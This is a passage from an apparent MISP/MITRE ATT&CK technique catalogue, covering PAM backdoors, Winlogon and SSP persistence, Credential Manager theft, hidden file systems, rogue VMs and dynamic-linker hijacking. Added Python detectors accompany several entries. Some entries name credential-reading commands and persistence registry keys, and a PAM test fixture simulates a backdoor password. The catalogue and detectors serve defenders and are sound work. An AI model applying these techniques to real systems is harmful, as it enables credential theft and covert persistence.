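OBSERVED["pam_unix.so"] = PRISTINE["pam_unix.so"] + b"\x00magic=SuperSecret"

if __name__ == "__main__":
    print(unknown_modules(parse_pam(SAMPLE_PAM_SSHD)))
    print(modified_modules(OBSERVED, BASELINE_HASHES))
```

The hash comparison only catches on-disk changes; a module replaced in memory or a legitimate module pointed at a rogue config (for example `pam_exec.so` with a new script) needs the allowlist check on arguments as well, which is why `args` is kept in the parsed rule.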

The tag is: misp-galaxy:mitre-attack-pattern="Pluggable Authentication Modules - T1556.003"

Table 5749. Table References

Links

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules

https://attack.mitre.org/techniques/T1556/003

https://github.com/zephrax/linux-pam-backdoor

https://linux.die.net/man/8/pam_unix

https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt

https://x-c3ll.github.io/posts/PAM-backdoor-DNS/

Runtime Data Manipulation - T1565.003

Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1565.003"

Table 5750. Table References

Links

https://attack.mitre.org/techniques/T1565/003

https://content.fireeye.com/apt/rpt-apt38

https://www.justice.gov/opa/press-release/file/1092091/download

Spearphishing via Service - T1566.003

Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It differs from other forms of spearphishing in that the message is delivered through third-party services rather than directly via enterprise email channels.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target’s interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that’s running in an environment. The adversary can then send malicious links or attachments through these services.

A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it’s something they were expecting. If the payload doesn’t work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003"

Table 5751. Table References

Links

https://attack.mitre.org/techniques/T1566/003

Delete Cloud Instance - T1578.003

An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.

An adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)
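A correlation rule covering both Create Cloud Instance (T1578.002) and Delete Cloud Instance (T1578.003), as an added Python example that is not part of the page or of any vendor product. It runs over CloudTrail-style records: one rule matches the snapshot, launch, attach, terminate sequence by a single principal inside a time window, the other reports instances terminated shortly after launch by anyone. The events, ARNs, instance IDs and windows are constructed; the field layout (`eventName`, `userIdentity.arn`, `responseElements.instancesSet.items[].instanceId` for RunInstances, `requestParameters.instancesSet.items[].instanceId` for TerminateInstances) follows the CloudTrail record format.

```python
from datetime import datetime

# Constructed CloudTrail-style records, reduced to the fields the rules read.
ALICE = "arn:aws:iam::111122223333:user/alice"
SAMPLE_EVENTS = [
    {"eventTime": "2023-05-01T10:00:00Z", "eventName": "CreateSnapshot", "userIdentity": {"arn": ALICE},
     "requestParameters": {"volumeId": "vol-0a1b"}, "responseElements": {}},
    {"eventTime": "2023-05-01T10:04:00Z", "eventName": "RunInstances", "userIdentity": {"arn": ALICE},
     "requestParameters": {}, "responseElements": {"instancesSet": {"items": [{"instanceId": "i-0dead"}]}}},
    {"eventTime": "2023-05-01T10:09:00Z", "eventName": "AttachVolume", "userIdentity": {"arn": ALICE},
     "requestParameters": {"instanceId": "i-0dead", "volumeId": "vol-0c3d"}, "responseElements": {}},
    {"eventTime": "2023-05-01T10:50:00Z", "eventName": "TerminateInstances", "userIdentity": {"arn": ALICE},
     "requestParameters": {"instancesSet": {"items": [{"instanceId": "i-0dead"}]}}, "responseElements": {}},
    {"eventTime": "2023-05-01T11:00:00Z", "eventName": "RunInstances",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:role/ci-deployer"},
     "requestParameters": {}, "responseElements": {"instancesSet": {"items": [{"instanceId": "i-0beef"}]}}},
]

SEQUENCE = ("CreateSnapshot", "RunInstances", "AttachVolume", "TerminateInstances")


def _ts(event):
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def snapshot_mount_lifecycles(events, sequence=SEQUENCE, window_seconds=7200):
    """Principals that perform `sequence` in order within the window: copy a
    volume, launch a fresh instance outside the existing security policy,
    attach the copy, then terminate the instance once the data is read out."""
    by_principal = {}
    for e in sorted(events, key=_ts):
        by_principal.setdefault(e["userIdentity"]["arn"], []).append(e)
    hits = []
    for arn, evs in by_principal.items():
        idx, start = 0, None
        for e in evs:
            t = _ts(e)
            if start is not None and (t - start).total_seconds() > window_seconds:
                idx, start = 0, None          # window expired: restart the match
            if e["eventName"] == sequence[idx]:
                start = t if start is None else start
                idx += 1
                if idx == len(sequence):
                    hits.append({"principal": arn, "start": start, "end": t})
                    idx, start = 0, None
    return hits


def short_lived_instances(events, max_lifetime_seconds=3600):
    """Instances terminated within max_lifetime_seconds of launch, whoever did
    it. Short lifetimes are the T1578.003 signature: the instance existed just
    long enough to do the work and then took its disk and logs with it."""
    launched, findings = {}, []
    for e in sorted(events, key=_ts):
        if e["eventName"] == "RunInstances":
            for item in e["responseElements"].get("instancesSet", {}).get("items", []):
                launched[item["instanceId"]] = (_ts(e), e["userIdentity"]["arn"])
        elif e["eventName"] == "TerminateInstances":
            for item in e["requestParameters"].get("instancesSet", {}).get("items", []):
                iid = item["instanceId"]
                if iid in launched:
                    lifetime = (_ts(e) - launched[iid][0]).total_seconds()
                    if lifetime <= max_lifetime_seconds:
                        findings.append({"instanceId": iid, "launched_by": launched[iid][1],
                                         "terminated_by": e["userIdentity"]["arn"],
                                         "lifetime_seconds": lifetime})
    return findings


if __name__ == "__main__":
    print(snapshot_mount_lifecycles(SAMPLE_EVENTS))
    print(short_lived_instances(SAMPLE_EVENTS))
```

Both rules depend on the termination being logged, so the page's point about unrecoverable evidence cuts the other way for the defender: the CloudTrail record survives even when the instance's disk does not, provided the trail writes to a bucket the compromised principal cannot delete from. Autoscaling and CI roles legitimately produce short-lived instances, so the second rule is usually scoped to human principals or paired with the first.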

The tag is: misp-galaxy:mitre-attack-pattern="Delete Cloud Instance - T1578.003"

Table 5752. Table References

Links

https://attack.mitre.org/techniques/T1578/003

https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/

https://cloud.google.com/logging/docs/audit#admin-activity

https://content.fireeye.com/m-trends/rpt-m-trends-2020

https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs

Code Signing Certificates - T1588.003

Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is.

Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.

The tag is: misp-galaxy:mitre-attack-pattern="Code Signing Certificates - T1588.003"

Table 5753. Table References

Links

https://attack.mitre.org/techniques/T1588/003

https://en.wikipedia.org/wiki/Code_signing

NTFS File Attributes - T1564.004

Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition.(Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes,(Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files).(Citation: SpectorOps Host-Based Jul 2017)(Citation: Microsoft File Streams)(Citation: MalwareBytes ADS July 2015)(Citation: Microsoft ADS Mar 2014)

Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus.(Citation: Journey into IR ZeroAccess NTFS EA)(Citation: MalwareBytes ADS July 2015)

The tag is: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004"

Table 5754. Table References

Links

http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html

http://msdn.microsoft.com/en-us/library/aa364404

https://attack.mitre.org/techniques/T1564/004

https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/

https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/

https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/

https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/

https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea

https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore

Winlogon Helper DLL - T1547.004

Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software[\Wow6432Node]\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> are used to manage additional helper programs and functionalities that support Winlogon.(Citation: Cylance Reg Persistence Sept 2013)

Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys are known to be abused: (Citation: Cylance Reg Persistence Sept 2013)

  • Winlogon\Notify - points to notification package DLLs that handle Winlogon events

  • Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on

  • Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on

Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004"

Table 5755. Table References

Links

https://attack.mitre.org/techniques/T1547/004

https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order

https://technet.microsoft.com/en-us/sysinternals/bb963902

Windows Credential Manager - T1555.004

Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)

The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.

Credential Lockers store credentials in encrypted .vcrd files, located under <code>%SystemDrive%\Users\[Username]\AppData\Local\Microsoft\[Vault|Credentials]\</code>. The encryption key can be found in a file named <code>Policy.vpol</code>, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)

Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. <code>vaultcmd.exe</code> is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as <code>CredEnumerateA</code>, may also be abused to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Credential Manager)

Adversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running <code>rundll32.exe keymgr.dll KRShowKeyMgr</code> then selecting the “Back up…” button on the “Stored User Names and Passwords” GUI.

Password recovery tools may also obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)

The tag is: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004"

Table 5756. Table References

Links

https://attack.mitre.org/techniques/T1555/004

https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/jj554668(v=ws.11)?redirectedfrom=MSDN

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)#credential-manager-store

https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-credenumeratea

https://github.com/gentilkiwi/mimikatz/wiki/howto--credential-manager-saved-credentials

https://www.passcape.com/windows_password_recovery_vault_explorer

Network Device Authentication - T1556.004

Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing native authentication mechanisms for local accounts on network devices.

[Modify System Image](https://attack.mitre.org/techniques/T1601) may include code implanted in the network device operating system to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check whether the user input is that password. If so, access is granted. Otherwise, the implanted code passes the credentials on to the normal verification path, so legitimate logins keep working.(Citation: Mandiant - Synful Knock)

The tag is: misp-galaxy:mitre-attack-pattern="Network Device Authentication - T1556.004"

Table 5757. Table References

Links

https://attack.mitre.org/techniques/T1556/004

https://tools.cisco.com/security/center/resources/integrity_assurance.html#13

https://tools.cisco.com/security/center/resources/integrity_assurance.html#7

https://www.mandiant.com/resources/synful-knock-acis

Hidden File System - T1564.005

Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)

Adversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)

The tag is: misp-galaxy:mitre-attack-pattern="Hidden File System - T1564.005"

Table 5758. Table References

Links

https://attack.mitre.org/techniques/T1564/005

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf

https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html

https://www.malwaretech.com/2014/11/virtual-file-systems-for-beginners.html

https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
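A hidden file system kept in reserved or unpartitioned space, the first implementation described above, shows up as a range of sectors that no partition claims. The following Python script is an added example, not part of the MISP galaxy or the cited reports: it parses the four primary entries of a classic MBR and lists every unallocated LBA range, which is where an analyst would then look for high-entropy data or carve for structures. The MBR in the block is constructed, the 2048-sector alignment allowance is an assumption, and GPT disks need a separate parser.

```python
"""Find unallocated gaps in an MBR partition table.

Added example (not from the MISP galaxy or ATT&CK). A hidden file system
stored in reserved or unpartitioned disk space leaves a gap between
partitions, or between the last partition and the end of the disk, that
no normal file system touches. This parser reads the four primary entries
of a classic MBR and reports every unallocated LBA range.
"""
import struct

SECTOR = 512
MBR_SIZE = 512
PART_TABLE_OFF = 0x1BE
PART_ENTRY_LEN = 16
MBR_SIGNATURE = b"\x55\xAA"


def parse_mbr(mbr):
    """Return a sorted list of (start_lba, size_sectors, type) for used entries."""
    if len(mbr) < MBR_SIZE or mbr[510:512] != MBR_SIGNATURE:
        raise ValueError("not a valid MBR (bad length or missing 0x55AA signature)")
    parts = []
    for i in range(4):
        off = PART_TABLE_OFF + i * PART_ENTRY_LEN
        entry = mbr[off:off + PART_ENTRY_LEN]
        # Entry layout: status(1) CHS start(3) type(1) CHS end(3) LBA start(4) size(4)
        ptype = entry[4]
        start_lba, size = struct.unpack_from("<II", entry, 8)
        if ptype == 0 or size == 0:
            continue  # empty slot
        parts.append((start_lba, size, ptype))
    return sorted(parts)


def unallocated_ranges(mbr, disk_sectors, slack_threshold=2048):
    """Return [(first_lba, last_lba, sectors)] for gaps larger than slack_threshold.

    Modern partitioning tools align the first partition at LBA 2048, so up
    to 2048 leading sectors is normal (assumption); anything bigger, or any
    gap between partitions or after the last one, is worth inspecting.
    """
    gaps = []
    cursor = 1  # LBA 0 is the MBR itself
    for start, size, _ in parse_mbr(mbr):
        if start > cursor:
            gap = start - cursor
            if gap > slack_threshold:
                gaps.append((cursor, start - 1, gap))
        cursor = max(cursor, start + size)
    if disk_sectors > cursor:
        gap = disk_sectors - cursor
        if gap > slack_threshold:
            gaps.append((cursor, disk_sectors - 1, gap))
    return gaps


def build_mbr(entries):
    """Construct a synthetic MBR from (start_lba, size, type) tuples (test data only)."""
    mbr = bytearray(MBR_SIZE)
    for i, (start, size, ptype) in enumerate(entries):
        off = PART_TABLE_OFF + i * PART_ENTRY_LEN
        mbr[off + 4] = ptype
        struct.pack_into("<II", mbr, off + 8, start, size)
    mbr[510:512] = MBR_SIGNATURE
    return bytes(mbr)


# Constructed sample: a 2 GiB disk (4194304 sectors) whose single Linux
# partition starts at LBA 2048 but stops 512 MiB short of the end of the disk.
SAMPLE_DISK_SECTORS = 4194304
SAMPLE_MBR = build_mbr([(2048, SAMPLE_DISK_SECTORS - 2048 - 1048576, 0x83)])

if __name__ == "__main__":
    for first, last, n in unallocated_ranges(SAMPLE_MBR, SAMPLE_DISK_SECTORS):
        print(f"unallocated LBA {first}-{last} ({n * SECTOR // (1024 * 1024)} MiB)")
```

Against a raw image, pass its first 512 bytes and the total sector count; a large trailing gap on a disk whose partition was clearly meant to fill it (as in the sample) is the pattern to chase, and an extended-partition chain or a GPT protective MBR (type 0xEE) needs the corresponding parser before the gap arithmetic means anything.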

Security Support Provider - T1547.005

Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user’s Domain password or smart card PINs.

The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Security Support Provider - T1547.005"

Table 5759. Table References

Links

http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html

https://attack.mitre.org/techniques/T1547/005

https://technet.microsoft.com/en-us/library/dn408187.aspx

Run Virtual Instance - T1564.006

Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)

Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Run Virtual Instance - T1564.006"

Table 5760. Table References

Links

https://attack.mitre.org/techniques/T1564/006

https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/

https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/

https://www.mci.gov.sg/-/media/mcicorp/doc/report-of-the-coi-into-the-cyber-attack-on-singhealth-10-jan-2019.ashx
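The shared-folder step above is what turns a dropped VM from a curiosity into a threat to the host: a writable share rooted at a whole drive lets the guest read and rewrite the host's files while host-side tools only see the hypervisor process. The following Python script is an added example, not code from the MISP galaxy, Sophos or the Shadowbunny write-up; it audits VirtualBox machine definitions (.vbox XML) for such shares. The element and attribute names follow the VirtualBox settings format; the sample document is constructed, not a captured configuration.

```python
"""Audit VirtualBox machine definitions (.vbox XML) for host-exposing shares.

Added example; not code from the MISP galaxy or the cited reports. Walks
every Machine/Hardware/SharedFolders/SharedFolder element and rates each
share by whether it is writable, exposes a whole drive, and auto-mounts.
"""
import xml.etree.ElementTree as ET

VBOX_NS = "{http://www.virtualbox.org/}"


def is_broad_host_path(host_path):
    """True if the share exposes an entire drive or the filesystem root."""
    hp = host_path.strip()
    if hp in ("/", "\\"):
        return True
    # Windows drive root in the forms C:, C:\ or C:/
    return (len(hp) in (2, 3) and hp[0].isalpha() and hp[1] == ":"
            and (len(hp) == 2 or hp[2] in "\\/"))


def audit_vbox(xml_text):
    """Return one finding per SharedFolder with a severity and the reasons for it."""
    root = ET.fromstring(xml_text)
    findings = []
    for machine in root.iter(VBOX_NS + "Machine"):
        for share in machine.iter(VBOX_NS + "SharedFolder"):
            host = share.get("hostPath", "")
            writable = share.get("writable", "false").lower() == "true"
            automount = share.get("autoMount", "false").lower() == "true"
            broad = is_broad_host_path(host)
            reasons = [r for r, hit in (("writable", writable), ("whole-volume", broad),
                                        ("auto-mounted", automount)) if hit]
            severity = "high" if writable and broad else "medium" if writable or broad else "low"
            findings.append({"vm": machine.get("name"), "share": share.get("name"),
                             "host_path": host, "severity": severity, "reasons": reasons})
    return findings


# Constructed sample .vbox: one share mapping the whole C: drive read/write,
# one read-only share of a single directory.
SAMPLE_VBOX = r"""<?xml version="1.0"?>
<VirtualBox xmlns="http://www.virtualbox.org/" version="1.16-windows">
  <Machine uuid="{00000000-0000-4000-8000-000000000001}" name="micro" OSType="Windows_64">
    <Hardware>
      <SharedFolders>
        <SharedFolder name="C_DRIVE" hostPath="C:\" writable="true" autoMount="true"/>
        <SharedFolder name="isos" hostPath="C:\Users\svc\isos" writable="false" autoMount="false"/>
      </SharedFolders>
    </Hardware>
  </Machine>
</VirtualBox>
"""

if __name__ == "__main__":
    for f in audit_vbox(SAMPLE_VBOX):
        print(f"[{f['severity']}] {f['vm']}:{f['share']} -> {f['host_path']} {f['reasons']}")
```

On a live host the .vbox files live under the VirtualBox machine folder of whichever user launched the VM, which is itself a useful hunt: a machine definition owned by a service account, or VirtualBox binaries outside Program Files, deserve the same attention as the share list.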

Netsh Helper DLL - T1546.007

Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.

Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)

The tag is: misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1546.007"

Table 5761. Table References

Links

https://attack.mitre.org/techniques/T1546/007

https://github.com/outflankbv/NetshHelperBeacon

https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html

https://technet.microsoft.com/library/bb490939.aspx

Dynamic Linker Hijacking - T1574.006

Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries that export the same symbol names.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)

On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set these variables from a shell with the <code>export</code> command, from native code with the <code>setenv</code> or <code>putenv</code> functions, or programmatically from higher-level languages such as Python's <code>os.environ</code>.

On Linux, adversaries may set <code>LD_PRELOAD</code> to point to malicious libraries that export the same symbols as legitimate libraries requested by a victim program, causing the dynamic linker to load the adversary's code when the victim program starts. <code>LD_PRELOAD</code> can be set via the environment variable or the <code>/etc/ld.so.preload</code> file; the latter applies system-wide to every dynamically linked program.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Preloaded libraries are opened and mapped into memory by the dynamic linker (the same <code>dlopen()</code>/<code>mmap()</code> path used for any shared object) and placed ahead of the program's other dependencies in symbol lookup order.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle)(Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers)

On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic linker (dyld) is implemented at a lower level. Adversaries can set the <code>DYLD_INSERT_LIBRARIES</code> environment variable to point to malicious libraries that export the names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass)

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic Linker Hijacking - T1574.006"

Table 5762. Table References

Links

http://hick.org/code/skape/papers/needle.txt

http://phrack.org/issues/51/8.html

http://www.nth-dimension.org.uk/pub/BTL.pdf

https://attack.mitre.org/techniques/T1574/006

https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/

https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html

https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191

https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/

https://www.baeldung.com/linux/ld_preload-trick-what-is

https://www.datawire.io/code-injection-on-linux-and-macos/

https://www.man7.org/linux/man-pages/man8/ld.so.8.html

https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html
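Because the dynamic linker reads the preload variables at exec time, the environment recorded in /proc/<pid>/environ is exactly what decided which libraries were injected into a running process, and /etc/ld.so.preload is a single file that should normally not exist. The following Python script is an added example, not code from the MISP galaxy or the cited papers; the parsing functions take raw bytes/text so the constructed samples in the block run on any OS, while scan_proc() and check_ld_so_preload() do the live collection on Linux.

```python
"""Detect preload-variable hijacking in running processes and /etc/ld.so.preload.

Added example; not code from the MISP galaxy or the cited papers. On Linux,
scan_proc() reads /proc/<pid>/environ for every process it can access and
reports any LD_PRELOAD or DYLD_INSERT_LIBRARIES setting; check_ld_so_preload()
lists whatever /etc/ld.so.preload names (the file is normally absent).
"""
import os
from pathlib import Path

PRELOAD_VARS = ("LD_PRELOAD", "DYLD_INSERT_LIBRARIES")


def parse_environ(environ):
    """Parse the NUL-separated KEY=VALUE block of /proc/<pid>/environ into a dict."""
    env = {}
    for item in environ.split(b"\0"):
        if b"=" in item:
            key, value = item.split(b"=", 1)
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


def preload_from_env(env):
    """Return [(variable, library)] for each library a preload variable names."""
    hits = []
    for var in PRELOAD_VARS:
        # ld.so accepts ':' or whitespace as separators; dyld uses ':'
        for lib in env.get(var, "").replace(" ", ":").split(":"):
            if lib:
                hits.append((var, lib))
    return hits


def parse_ld_so_preload(text):
    """Library paths listed in /etc/ld.so.preload (whitespace or ':' separated).

    Text after '#' is dropped as a comment by this parser."""
    libs = []
    for line in text.splitlines():
        libs.extend(line.split("#", 1)[0].replace(":", " ").split())
    return libs


def scan_proc(proc_root="/proc"):
    """Live Linux scan: [(pid, exe, variable, library)] for affected processes."""
    findings = []
    for entry in os.scandir(proc_root):
        if not entry.name.isdigit():
            continue
        try:
            env = parse_environ(Path(entry.path, "environ").read_bytes())
            exe = os.readlink(os.path.join(entry.path, "exe"))
        except OSError:
            continue  # exited, kernel thread, or not readable with our privileges
        for var, lib in preload_from_env(env):
            findings.append((int(entry.name), exe, var, lib))
    return findings


def check_ld_so_preload(path="/etc/ld.so.preload"):
    """Libraries forced into every process by the system-wide preload file."""
    try:
        return parse_ld_so_preload(Path(path).read_text())
    except FileNotFoundError:
        return []


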